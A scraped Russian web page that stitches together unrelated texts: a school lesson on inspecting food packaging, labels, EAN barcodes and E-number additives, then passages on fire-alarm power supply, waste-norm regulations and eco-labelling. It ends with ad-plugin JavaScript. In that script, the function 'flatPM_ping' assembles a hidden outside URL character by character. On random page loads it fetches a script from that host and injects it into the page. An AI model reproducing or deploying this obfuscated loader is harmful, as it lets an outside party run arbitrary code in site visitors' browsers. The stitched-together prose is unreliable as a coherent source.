Теперь вам предстоит провести первичную экологическую экспертизу продукта питания по упаковке, имеющейся у вас на столе. При выполнении этой практической работы (алгоритм – на столах) вы с помощью имеющейся у вас таблицы (приложение №2) можете определить опасность для здоровья спецдобавок, указанных на упаковке (этикетке). Кроме того, на столах у вас имеются некоторые коды стран по данным Международной ассоциации EAN (приложение №1) и требования к оформлению практической работы.

По истечении отведенного на практическую работу времени несколько учащихся делают краткие сообщения по итогам практической работы. Затем с помощью учителя учащиеся формулируют, какие знания, умения и навыки они получили на уроке. В заключение учитель говорит, что если учащиеся теперь при приобретении того или иного товара смогут правильно определить хотя бы срок его годности, то уже это во многих случаях поможет им сохранить свое здоровье, и, следовательно, цель урока будет достигнута.

Алгоритм проведения первичной экологической экспертизы упакованных продуктов питания

1. Экспертиза упаковки

А. Вид упаковки (металлическая банка, стеклянная банка с закатанной металлической крышкой, стеклянная банка с пластмассовой крышкой, пластмассовая упаковка, алюминиевая фольга, бумага и т.д.).
Б. Сохранность упаковки (механическое повреждение, коррозия и т.д.).
В. Наличие бомбажа банки.

2. Экспертиза этикетки

А. Полнота информации на этикетке:
– наименование предприятия-изготовителя, его адрес;
– наименование товара, его масса;
– состав;
– калорийность;
– срок годности;
– дата изготовления;
– обозначения ГОСТа или ТУ;
– предупреждения об опасности (в случае необходимости);
– наличие консервантов и пищевых добавок.

Б. Соответствие информации на этикетке штриховому коду:
– номер изделия под штриховым кодом чаще всего состоит из 13 цифр;
– первые две цифры соответствуют шифру страны-изготовителя или продавца товара;
– следующие 5 цифр – код предприятия-изготовителя;
– и еще 5 цифр – наименование товара, его потребительские свойства, размеры, масса, цвет;
– последняя цифра – контрольная, используемая для проверки правильности считывания штрихов сканером.

Код страны-изготовителя может состоять из трех знаков, а код предприятия – из четырех. Товары, имеющие небольшие размеры, могут иметь краткий код из восьми цифр.

В. Соответствие информации на этикетке и штампа на банке.

Трехрядная маркировка

Первый ряд – дата изготовления (например, 301096);
ворой ряд – номер смены (например, 102);
третий ряд – тип консервов и номер предприятия (например, Р100): «Р» – рыбные, «Д», «КП», «К», «ЦС», «МС», «ОХ» – мясные.

Икра лососевая маркируется в 3 ряда:

первый ряд – дата (декада – одна цифра, месяц и год – по 2 цифры);
второй ряд – ассортиментный знак «икра»;
третий ряд – до 3 знаков – номер завода, 1 знак – смена, Р – индекс рыбной промышленности.

Двухрядная маркировка.

первый ряд – буква М (знак молочной промышленности) и номер предприятия (например, 2000);
второй ряд – номер смены (до трех цифр) и дата (месяц – 2 цифры и год – 2 цифры).

первый ряд – дата (декада – 1 цифра, месяц и год – по 2 цифры);
второй ряд – номер мастера (1–2 цифры).

Г. Наличие консервантов и пищевых добавок.

Консерванты и пищевые добавки (эмульгаторы, красители, смачиватели и др.) в соответствии с международным шифром обозначаются буквой «Е» с тремя цифрами. Многие из добавок не безопасны для здоровья (приложение №2).

3. Заключение

Указывается возможность использования продукта для питания. В качестве образца следует использовать одно из трех следующих заключений.

1. Продукт может использоваться для питания, но противопоказан лицам, страдающим ожирением и сахарным диабетом (большое количество углеводов).
2. Продукт может быть использован для питания, но не рекомендуется лицам, страдающим частыми расстройствами желудка.
3. Продукт не рекомендуется к применению, так как содержит запрещенную спецдобавку Е152.

Приложение №1

Некоторые коды стран по данным Международной ассоциации EAN

Приложение №2

Список наиболее вредных пищевых добавок

Условные обозначения:

«РК» – вызывает расстройство кишечника; «РД» – влияет на артериальное давление; «С» – вызывает сыпь; «Р» – канцероген; «Х» – холестерин; «П» –подозрительный; «РЖ» – вызывает расстройство желудка; «О» – опасный по ряду причин; «ОО» – очень опасный по ряду причин; «ВК» – вреден для кожи; «З» – запрещен к применению.

Требования к электропитанию пожарной сигнализации

Согласно нормативной документации по пожарной безопасности различных объектов для поддержки работоспособности всех устройств следует использовать питание пожарной сигнализации, которое обеспечит непрерывную подачу требуемого напряжения ко всем устройства защитного противопожарного комплекса. Системы и устройства, которые входят в состав противопожарного оборудования относятся к первой категории электрических устройств по обеспечению надежности их электропитания. Соответственно этому они должны питаться от системы бесперебойного электропитания, которая включает в свой состав независимые источники питания для пожарной сигнализации. Это могут быть два источника переменного тока либо один источник переменного тока и один источник постоянного тока. Переключение между источниками подачи рабочего напряжения должно осуществляться в автоматическом режиме при выходе из строя основного блока питания согласно нормам. В качестве резервного источника питания могут применяться аккумуляторные батареи. Они представляют собой высокоэффективное резервные блоки электропитания, которые могут поддерживать функционирование всех компонентов систем противопожарной безопасности на протяжении одних суток, при условии, что устройства находятся в дежурном режиме, или на протяжении трех часов, если устройства работают в режиме тревоги.

Оформление расчета нормативов образования отходов и лимитов на их размещение

Порядок разработки и утверждения нормативов образования отходов и лимитов на их размещение, представления и контроля отчетности об образовании, использовании, обезвреживании, о размещении отходов (за исключением статистической отчетности) устанавливает федеральный орган исполнительной власти в области обращения с отходами.

пункт 7 статьи 18 Федерального закона от 24.06.1998 № 89-ФЗ «Об отходах производства и потребления» (в редакции, действующей с 01.01.2019)

Порядок разработки и утверждения нормативов образования отходов и лимитов на их размещение (далее –Порядок), утвержденный Приказом Минприроды России от 25.02.2010 № 50 «О Порядке разработки и утверждения нормативов образования отходов и лимитов на их размещение», применяется в части, не противоречащей действующему законодательству (Письмо Росприроднадзора от 29.12.2018 N АА-10-02-36/29629 «О направлении информации») — для интересующихся письмо в конце статьи.

Нормативы образования отходов и лимиты на их размещение утверждаются территориальными органами Росприроднадзора на основании комплекта обосновывающих расчетов, материалов и документов — проекта нормативов образования отходов и лимитов на их размещение, разрабатываемого индивидуальными предпринимателями и юридическими лицами в соответствии с методическими указаниями, утвержденными Министерством природных ресурсов и экологии Российской Федерации (пункт 5 Порядка).

Методические указания по разработке проектов нормативов образования отходов и лимитов на их размещение утверждены Приказом Минприроды России от 05.08.2014 № 349 «Об утверждении Методических указаний по разработке проектов нормативов образования отходов и лимитов на их размещение».

Таким образом, требуемый с 01.01.2019 г. для объектов НВОС 1,2 категории расчет нормативов образования отходов и лимитов на их размещение — это старый добрый проект нормативов образования отходов и лимитов на их размещение.

Перспективы экостандартизации

Укрепление тенденции устойчивого развития на фоне ухудшения экологической обстановки и рост интереса потребителей к экопродукции и дальше будут способствовать все более широкому охвату различных отраслей производства добровольными экостандартами.

Именно они на сегодняшний день являются для бизнеса основными ориентирами в вопросах экологизации. Причем комплексные стандарты, содержащие требования как к жизненному циклу продукции, так и к органическим продуктам питания, получат наиболее широкое распространение.

Это связано с тем, что растет число потребителей, считающих, что экологичный продукт должен быть безопасен как для человека, так и для окружающей среды. К тому же комплексные стандарты всегда учитывают новые технологии, а значит, будут возникать новые критерии. Например, в программе «Листок жизни» уже есть стандарт для инновационной продукции с использованием наноматериалов – для фотоэлектрических модулей для солнечных батарей.

Эти же факторы будут стимулировать распространение стандартов, ориентированных на оценку конкретных экологических характеристик (FSC, MCS, Energy Star и др.). Такие программы с точки зрения трудозатрат на разработку критериев более эффективны при оценке товаров с коротким маркетинговым циклом.

В то же время сертификаты соответствия требованиям этих стандартов засчитываются при прохождении процедур, необходимых для получения экомаркировки I типа. В конечном итоге параллельно можно использовать как стандарты, содержащие критерии оценки жизненного цикла продукции, так и те, что позволяют оценивать одну или несколько ее характеристик.

Все это будет способствовать экологизации производства. Хороший пример – совместное продвижение программой экомаркировки «Листок жизни» и российским офисом FSC концепции «зеленых» госзакупок в России.

Чтобы российские предприятия активнее внедряли экологические стандарты, необходимо решить несколько важных задач. Во-первых, на законодательном уровне ограничить «гринвошинг» – регламентировать применение терминов «эко», «био», «органик». Во-вторых, запустить программу массового повышения экологической грамотности: покупатели должны понимать разницу между «зелеными», ничем не подкрепленными рекламными лозунгами недобросовестных производителей и экомаркировкой по итогам сертификации.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"<$1>$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n<=0&&(clearInterval(r),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};